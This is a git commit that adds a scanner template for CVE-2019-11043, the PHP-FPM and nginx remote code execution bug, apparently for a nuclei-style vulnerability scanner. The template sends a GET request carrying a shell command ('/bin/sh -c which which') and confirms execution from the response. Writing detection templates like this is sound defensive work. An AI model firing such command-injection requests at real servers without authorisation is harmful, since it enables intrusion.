Create CVE-2019-11043.yaml

PHP-FPM & nginx RCE (CVE-2019-11043)
2020-09-04 22:28:41 +00:00 · 2020-09-04 22:28:41 +00:00 · b773cc9f0f
parent ff76d6a1c8
commit b773cc9f0f
1 changed files with 18 additions and 0 deletions
--- a/cves/CVE-2019-11043.yaml
+++ b/cves/CVE-2019-11043.yaml
@ -0,0 +1,18 @@
+id: CVE-2019-11043
+
+info:
+  name: PHP-FPM & nginx RCE
+  author: geeknik
+  severity: high
+  description: https://github.com/neex/phuip-fpizdam
+  
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?a=/bin/sh+-c+'which+which'&"
+
+    matchers:
+      - type: word
+        words:
+          - "/bin/which"
+        part: body